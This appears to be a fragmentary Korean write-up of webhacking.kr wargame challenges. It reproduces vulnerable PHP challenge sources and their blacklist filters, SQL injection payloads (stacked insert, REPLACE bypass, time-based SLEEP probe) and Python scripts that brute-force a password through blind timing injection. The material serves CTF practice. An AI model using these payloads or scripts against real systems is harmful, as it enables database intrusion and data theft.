이때 침착하게 다음 스탭을 따라보자.
pip install crytpto pip install pycrypto
이렇게 설치하였나?
그럼 당신은 실패하였다........
crypto 패키지를 깔게 되면 cipher (lower case)가 생성되고 참조가 안된다 ㅡㅡ
pip uninstall crypto pip uninstall pycrypto pip install pycrypto
반드시 하나만! 해주자. 내생각에는 pip 이슈인것같다.
pip install crytpto pip install pycrypto
pip uninstall crypto pip uninstall pycrypto pip install pycrypto
<? echo("<a href=index_lolll.phps>source</a>"); if(!$_GET[id]) $_GET[id]="guest"; echo("<html><head><title>Challenge 61</title></head><body>"); if(eregi("\(|\)|union|select|challenge|from|,|by|\.",$_GET[id])) exit("Access Denied"); if(strlen($_GET[id])>18) exit("Access Denied"); $q=@mysql_fetch_array(mysql_query("select $_GET[id] from c_61 order by id desc limit 1")); echo("<b>$q[id]</b><br>"); if($q[id]=="admin") @clear(); echo("</body></html>"); ?>
<? sleep(1); if(eregi("[0-9]",$_COOKIE[PHPSESSID])) exit("Access Denied<br><a href=index.phps>index.phps</a>"); if($_GET[mode]=="auth") { echo("Auth~<br>"); $f=@file("readme/$_SESSION[id].txt"); for($i=0;$i<=strlen($f);$i++) { $result.=$f[$i]; } if(eregi("$_SESSION[id]",$result)) { echo("Done!"); @unlink("readme/$_SESSION[id].txt"); @clear(); exit(); } } $f=@fopen("readme/$_SESSION[id].txt","w"); @fwrite($f,"$_SESSION[id]"); @fclose($f); if($_SERVER[REMOTE_ADDR]!="") { sleep(1); @unlink("readme/$_SESSION[id].txt"); } ?>
Auth~<br>Done!<script>alert('Congratulation!');</script><center><h1><br><br><hr> <font color=gray>You have cleared the 60 problems.</font><br><br><font color=gre en><b>Score + 300</b></font><br><hr></h1></center>
<? if($_POST[lid] && $_POST[lphone]) { $q=@mysql_fetch_array(mysql_query("select id,lv from c59 where id='$_POST[lid]' and phone='$_POST[lphone]'")); if($q[id]) { echo("id : $q[id]<br>lv : $q[lv]<br><br>"); if($q[lv]=="admin") { @mysql_query("delete from c59"); @clear(); } echo("<br><a href=index.php>back</a>"); exit(); } } if($_POST[id] && $_POST[phone]) { if(strlen($_POST[phone])>=20) exit("Access Denied"); if(eregi("admin",$_POST[id])) exit("Access Denied"); if(eregi("admin|0x|#|hex|char|ascii|ord|from|select|union",$_POST[phone])) exit("Access Denied"); @mysql_query("insert into c59 values('$_POST[id]',$_POST[phone],'guest')"); } ?>
"select id,lv from c59 where id=''; insert into c59 values(CHAR(97),CHAR(97),CHAR(97,100,109,105,110)); #$_POST[lid]' and phone='$_POST[lphone]'"
'1',REPLACE('zdmin','z','a') --
kk=document.URL; kk=kk.substr(10,4);
<? $secret_key="????"; if(time()>1309064400) exit("오후 2시에 공개됩니다."); if($_POST[pw]) { if($_POST[pw]==$secret_key) { mysql_query("delete from challenge57msg"); @solve(); exit(); } } if($_GET[msg] && $_GET[se]) { if(eregi("from|union|select|and|or|not|&|\||benchmark",$_GET[se])) exit("Access Denied"); mysql_query("insert into challenge57msg(id,msg,pw,op) values('$_SESSION[id]','$_GET[msg]','$secret_key',$_GET[se])"); echo("Done<br><br>"); } ?>
hi','hi all',1); #
SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)
#!/usr/bin/env python # -*- coding: utf8 -*- import urllib, urllib2, time sess = "" headers = {'Host': 'webhacking.kr', 'Cookie': "PHPSESSID={}".format(sess) } pw = '' for j in range(32,132): url = 'http://webhacking.kr/challenge/web/web-34/index.php?msg=m&se=if(substr(pw,1,1)={},sleep(2),0)'.format(hex(j)) req = urllib2.Request(url, '', headers) start_time = time.time() response = urllib2.urlopen(req).read() time = time.time() - start_time print time, chr(j)
0.100000143051 0.108999967575 0.104000091553 0.0979998111725 0.0980000495911 0.101999998093 0.0970001220703 0.115999937057 2.10299992561 0.113000154495 0.105000019073 0.101999998093
[('h', 'k', 'p', '.'), ('h', 'k', '.', 'p'), ('h', 'p', 'k', '.'), ('h', 'p', '.', 'k'), ('h', '.', 'k', 'p'), ('h', '.', 'p', 'k'), ('k', 'h', 'p', '.'), ('k', 'h', '.', 'p'), ('k', 'p', 'h', '.'), ('k', 'p', '.', 'h'), ('k', '.', 'h', 'p'), ('k', '.', 'p', 'h'), ('p', 'h', 'k', '.'), ('p', 'h', '.', 'k'), ('p', 'k', 'h', '.'), ('p', 'k', '.', 'h'), ('p', '.', 'h', 'k'), ('p', '.', 'k', 'h'), ('.', 'h', 'k', 'p'), ('.', 'h', 'p', 'k'), ('.', 'k', 'h', 'p'), ('.', 'k', 'p', 'h'), ('.', 'p', 'h', 'k'), ('.', 'p', 'k', 'h')]
('k', '.', 'p', 'h')
<!-- hint rank table ==================== ip ( = id ) score **password** --> small letter ==================== -->
0 limit 2, 1 procedure analyse()
<script> function run(){ if(window.ActiveXObject){ try { return new ActiveXObject('Msxml2.XMLHTTP'); } catch (e) { try { return new ActiveXObject('Microsoft.XMLHTTP'); } catch (e) { return null; } } }else if(window.XMLHttpRequest){ return new XMLHttpRequest(); }else{ return null; } } x=run(); function answer(i) { x.open('GET','?m='+i,false); x.send(null); aview.innerHTML=x.responseText; i++; if(x.responseText) setTimeout("answer("+i+")",100); if(x.responseText=="") aview.innerHTML="?"; } setTimeout("answer(0)",10000); </script>
#!/usr/bin/env python # -*- coding: utf8 -*- import urllib, urllib2, re sess = "" headers = {'Host': 'webhacking.kr', 'Cookie': "PHPSESSID={}".format(sess), 'Referer': 'http://webhacking.kr/challenge/bonus/bonus-14/' } pw = '' for i in range(0,33): url = 'http://webhacking.kr/challenge/bonus/bonus-14/?m={}'.format(i) req = urllib2.Request(url, '', headers) response = urllib2.urlopen(req).read() pw = pw + str(response) print pw